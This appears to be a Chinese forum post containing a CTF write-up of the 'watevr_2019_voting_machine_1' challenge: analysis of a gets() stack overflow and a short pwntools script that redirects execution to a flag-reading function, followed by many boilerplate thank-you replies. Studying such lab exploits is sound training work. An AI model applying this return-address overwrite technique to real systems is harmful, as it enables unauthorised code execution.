何玲 发表于 2025-10-5 17:02:48

PWN手成长之路-06-watevr_2019_voting_machine_1-栈溢出+劫持


远程连接,看一下交互。发现是一个投票系统,让用户在0-10之间选择一个数字并输入。

file 查看文件。64 位 ELF 可执行文件。

checksec 查看文件安全属性。开启了 NX 保护,栈上无执行权限。

IDA 打开文件。查看 main 函数,发现了 gets 危险函数。

双击 v4,发现了栈溢出大小为 0x2+8=0x10。

尝试寻找 backdoor 函数,发现了 super_secret_fuction 函数,没有 /bin/bash,但是存在 fopen("/home/ctf/flag.txt","r") 以只读模式打开flag.txt文件。

PWN流程:溢出 v4 ,覆盖 super_secret_fuction 函数,让其执行fopen("/home/ctf/flag.txt","r"),再通过不断接受数据以达到劫持的目的,将 flag 的内容放到自定义变量中,最后打印出这个变量。
exp:
from pwn import *

r=remote('node5.buuoj.cn',29744)
flag_addr=0x400807
payload=b'a'*10+p64(flag_addr)#一定要是 10, 而不能是 0x10
r.sendline(payload)
flag=r.recvall()
print(flag)得到 flag。


来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

挫莉虻 发表于 2025-10-19 04:31:49

收藏一下   不知道什么时候能用到

抽厉 发表于 2025-12-18 23:53:16

前排留名,哈哈哈

訾懵 发表于 2026-1-4 14:06:41

yyds。多谢分享

咚獭 发表于 2026-1-7 06:31:06

这个好,看起来很实用

俏襟选 发表于 2026-1-16 10:03:29

新版吗?好像是停更了吧。

捐催制 发表于 2026-1-18 08:34:45

喜欢鼓捣这些软件,现在用得少,谢谢分享!

徙办 发表于 2026-1-18 14:18:36

感谢分享,下载保存了,貌似很强大

羡渥蛛 发表于 2026-1-19 11:02:58

感谢,下载保存了

菅舛 发表于 2026-1-20 12:32:32

感谢,下载保存了

人弧 发表于 2026-1-21 11:40:42

喜欢鼓捣这些软件,现在用得少,谢谢分享!

汤流婉 发表于 2026-1-27 00:04:25

谢谢分享,试用一下

左优扬 发表于 2026-1-29 05:41:19

喜欢鼓捣这些软件,现在用得少,谢谢分享!

虹姥 发表于 2026-2-6 07:38:04

用心讨论,共获提升!

赴忽 发表于 2026-2-8 01:22:49

喜欢鼓捣这些软件,现在用得少,谢谢分享!

崔竹 发表于 2026-2-9 07:42:24

感谢发布原创作品,程序园因你更精彩

上官银柳 发表于 2026-2-9 09:35:31

过来提前占个楼

禄磊 发表于 2026-2-9 13:19:28

感谢分享,学习下。

溶绚 发表于 2026-2-9 13:28:00

很好很强大我过来先占个楼 待编辑

韶侪 发表于 2026-2-9 16:07:18

喜欢鼓捣这些软件,现在用得少,谢谢分享!
页: [1] 2
查看完整版本: PWN手成长之路-06-watevr_2019_voting_machine_1-栈溢出+劫持